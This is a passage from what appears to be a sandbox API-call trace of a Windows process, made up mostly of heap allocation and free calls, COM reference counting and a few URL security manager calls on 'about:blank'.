hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.310] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.310] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.310] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.310] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.311] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.311] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420c90 | out: hHeap=0x3f0000) returned 1 [0080.311] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.311] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414400 | out: hHeap=0x3f0000) returned 1 [0080.311] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e670 | out: hHeap=0x3f0000) returned 1 [0080.311] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.311] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.311] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.311] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.311] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.311] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.311] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.311] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.311] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420cb0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.312] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.313] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449970 | out: hHeap=0x3f0000) returned 1 [0080.313] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42f340 | out: hHeap=0x3f0000) returned 1 [0080.313] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42d6f0 | out: hHeap=0x3f0000) returned 1 [0080.313] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.314] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x445690 | out: hHeap=0x3f0000) returned 1 [0080.314] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.314] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x459c70 | out: hHeap=0x3f0000) returned 1 [0080.314] IUnknown:Release (This=0x42da90) returned 0x4 [0080.314] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x418ec0 | out: hHeap=0x3f0000) returned 1 [0080.314] IUnknown:Release (This=0x42da90) returned 0x3 [0080.315] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4574d0 | out: hHeap=0x3f0000) returned 1 [0081.712] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41b3e0 | out: hHeap=0x3f0000) returned 1 [0081.712] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.712] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.713] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x437c50 | out: hHeap=0x3f0000) returned 1 [0081.713] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.713] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.713] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e870 | out: hHeap=0x3f0000) returned 1 [0081.713] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.713] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e8f0 | out: hHeap=0x3f0000) returned 1 [0081.713] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44fe90 | out: hHeap=0x3f0000) returned 1 [0081.714] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44f790 | out: hHeap=0x3f0000) returned 1 [0081.714] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.714] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4462f0 | out: hHeap=0x3f0000) returned 1 [0081.715] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45ba10 | out: hHeap=0x3f0000) returned 1 [0081.715] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ecc310 | out: hHeap=0x3f0000) returned 1 [0081.716] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ee0140 | out: hHeap=0x3f0000) returned 1 [0081.716] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x448010 | out: hHeap=0x3f0000) returned 1 [0081.716] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ee7370 | out: hHeap=0x3f0000) returned 1 [0081.716] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x439750 | out: hHeap=0x3f0000) returned 1 [0081.716] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4465c0 | out: hHeap=0x3f0000) returned 1 [0081.716] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ee45f0 | out: hHeap=0x3f0000) returned 1 [0081.717] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ef1d40 | out: hHeap=0x3f0000) returned 1 [0081.717] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d030 | out: hHeap=0x3f0000) returned 1 [0081.717] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x446410 | out: hHeap=0x3f0000) returned 1 [0081.717] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c8b0 | out: hHeap=0x3f0000) returned 1 [0081.718] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x446530 | out: hHeap=0x3f0000) returned 1 [0081.718] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.718] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.718] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.718] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cda60 | out: hHeap=0x3f0000) returned 1 [0081.718] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4464a0 | out: hHeap=0x3f0000) returned 1 [0081.718] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.718] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e0740 | out: hHeap=0x3f0000) returned 1 [0081.722] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2dfc7f0 | out: hHeap=0x3f0000) returned 1 [0081.731] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4ce6b0 | out: hHeap=0x3f0000) returned 1 [0081.731] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x446380 | out: hHeap=0x3f0000) returned 1 [0081.732] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45ba60 | out: hHeap=0x3f0000) returned 1 [0081.732] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x437d50 | out: hHeap=0x3f0000) returned 1 [0081.732] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d720 | out: hHeap=0x3f0000) returned 1 [0081.732] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x80) returned 0x446380 [0081.732] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x4cda60 [0081.732] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x4) returned 0x42d6f0 [0081.732] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x4517c0 [0081.733] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4517c0 | out: hHeap=0x3f0000) returned 1 [0081.733] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.733] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x435f88, dwReserved=0x0 | out: ppSM=0x435f88*=0x4d2200) returned 0x0 [0081.733] IInternetSecurityManager:SetSecuritySite (This=0x4d2200, pSite=0x435f98) returned 0x0 [0081.733] IUnknown:AddRef (This=0x435f98) returned 0x31 [0081.733] IUnknown:QueryInterface (in: This=0x435f98, riid=0x7fefdbfe970*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x30ee10 | out: ppvObject=0x30ee10*=0x435fa0) returned 0x0 [0081.734] IServiceProvider:QueryService (in: This=0x435fa0, guidService=0x7fefdc017f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7fefdc017f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x4d2248 | out: ppvObject=0x4d2248*=0x0) returned 0x80004002 [0081.734] IServiceProvider:QueryService (in: This=0x435fa0, guidService=0x7fefdc018b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7fefdc018b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x4d2240 | out: ppvObject=0x4d2240*=0x0) returned 0x80004002 [0081.734] IServiceProvider:QueryService (in: This=0x435fa0, guidService=0x7fefdbfe0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7fefdbfe0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x4d2238 | out: ppvObject=0x4d2238*=0x7fef0002708) returned 0x0 [0081.734] IUnknown:Release (This=0x435fa0) returned 0x0 [0081.734] IUnknown:AddRef (This=0x42cf10) returned 0x4 [0081.734] IInternetSecurityManager:SetSecuritySite (This=0x7fef0002708, pSite=0x420850) returned 0x800c0011 [0081.738] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0081.738] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0081.739] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0081.739] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fef0002708, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x30ef10, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x30ef10*=0x0) returned 0x0 [0081.739] IUnknown:Release (This=0x42cf10) returned 0x3 [0081.739] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e910 | out: hHeap=0x3f0000) returned 1 [0081.739] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d2160 | out: hHeap=0x3f0000) returned 1 [0081.739] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.740] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.740] IUnknown:Release (This=0x414180) returned 0x1 [0081.740] IUnknown:Release (This=0x42cf10) returned 0x2 [0081.740] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42f480 | out: hHeap=0x3f0000) returned 1 [0081.740] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4dbb90 | out: hHeap=0x3f0000) returned 1 [0081.741] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x445600 | out: hHeap=0x3f0000) returned 1 [0081.741] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45bc90 | out: hHeap=0x3f0000) returned 1 [0081.741] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.742] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42d6f0 | out: hHeap=0x3f0000) returned 1 [0081.742] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cda60 | out: hHeap=0x3f0000) returned 1 [0081.742] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.742] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x446380 | out: hHeap=0x3f0000) returned 1 [0081.743] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x418a60 | out: hHeap=0x3f0000) returned 1 [0081.743] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2edd290 | out: hHeap=0x3f0000) returned 1 [0081.744] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xa8) returned 0x4517c0 [0081.744] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x44d720 [0081.744] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.744] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9) returned 0x4cda60 [0081.744] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9) returned 0x4cdac0 [0081.744] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cdac0 | out: hHeap=0x3f0000) returned 1 [0081.744] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cda60 | out: hHeap=0x3f0000) returned 1 [0081.745] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d720 | out: hHeap=0x3f0000) returned 1 [0081.745] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4517c0 | out: hHeap=0x3f0000) returned 1 [0081.745] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.745] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.745] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.745] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x446260 | out: hHeap=0x3f0000) returned 1 [0081.745] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.746] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cffa0 | out: hHeap=0x3f0000) returned 1 [0081.746] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420b90 | out: hHeap=0x3f0000) returned 1 [0081.746] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.746] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4461d0 | out: hHeap=0x3f0000) returned 1 [0081.746] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.747] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cfeb0 | out: hHeap=0x3f0000) returned 1 [0081.747] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41b1b0 | out: hHeap=0x3f0000) returned 1 [0081.747] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.747] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.747] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.747] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.747] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.747] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x43bdd0 | out: hHeap=0x3f0000) returned 1 [0081.747] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420a70 | out: hHeap=0x3f0000) returned 1 [0081.747] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e430 | out: hHeap=0x3f0000) returned 1 [0081.748] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x43c000 | out: hHeap=0x3f0000) returned 1 [0081.748] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.748] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x445840 | out: hHeap=0x3f0000) returned 1 [0081.748] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.748] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d7e0 | out: hHeap=0x3f0000) returned 1 [0081.748] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42f240 | out: hHeap=0x3f0000) returned 1 [0081.748] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e0b00 | out: hHeap=0x3f0000) returned 1 [0081.748] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.749] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e08c0 | out: hHeap=0x3f0000) returned 1 [0081.749] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.749] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e08f0 | out: hHeap=0x3f0000) returned 1 [0081.749] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.749] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e0920 | out: hHeap=0x3f0000) returned 1 [0081.749] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.749] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e0950 | out: hHeap=0x3f0000) returned 1 [0081.749] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.750] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e0980 | out: hHeap=0x3f0000) returned 1 [0081.750] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e0b30 | out: hHeap=0x3f0000) returned 1 [0081.750] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e09b0 | out: hHeap=0x3f0000) returned 1 [0081.750] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.750] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e09e0 | out: hHeap=0x3f0000) returned 1 [0081.750] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0081.750] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e0a10 | out: hHeap=0x3f0000) returned 1 [0082.339] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.339] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e0a40 | out: hHeap=0x3f0000) returned 1 [0082.339] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.340] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e0a70 | out: hHeap=0x3f0000) returned 1 [0082.340] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.340] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e0aa0 | out: hHeap=0x3f0000) returned 1 [0082.340] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.340] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e0ad0 | out: hHeap=0x3f0000) returned 1 [0082.340] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e30080 | out: hHeap=0x3f0000) returned 1 [0082.341] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c910 | out: hHeap=0x3f0000) returned 1 [0082.341] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e400 | out: hHeap=0x3f0000) returned 1 [0082.341] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.341] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x43ba10 | out: hHeap=0x3f0000) returned 1 [0082.341] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.341] LsDestroyContext () returned 0x0 [0082.342] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ed2ee0 | out: hHeap=0x3f0000) returned 1 [0082.342] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ed3240 | out: hHeap=0x3f0000) returned 1 [0082.342] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ed3260 | out: hHeap=0x3f0000) returned 1 [0082.342] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ed3280 | out: hHeap=0x3f0000) returned 1 [0082.343] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x439950 | out: hHeap=0x3f0000) returned 1 [0082.343] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x439850 | out: hHeap=0x3f0000) returned 1 [0082.345] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x439a50 | out: hHeap=0x3f0000) returned 1 [0082.345] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x458010 | out: hHeap=0x3f0000) returned 1 [0082.345] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ec40d0 | out: hHeap=0x3f0000) returned 1 [0082.345] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.345] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2eca180 | out: hHeap=0x3f0000) returned 1 [0082.346] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x418a10 | out: hHeap=0x3f0000) returned 1 [0082.346] IUnknown:Release (This=0x4d2200) returned 0x0 [0082.346] IUnknown:Release (This=0x435f98) returned 0x0 [0082.346] IUnknown:Release (This=0x7fef0002708) returned 0x7fff [0082.347] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4508d0 | out: hHeap=0x3f0000) returned 1 [0082.347] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.347] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) 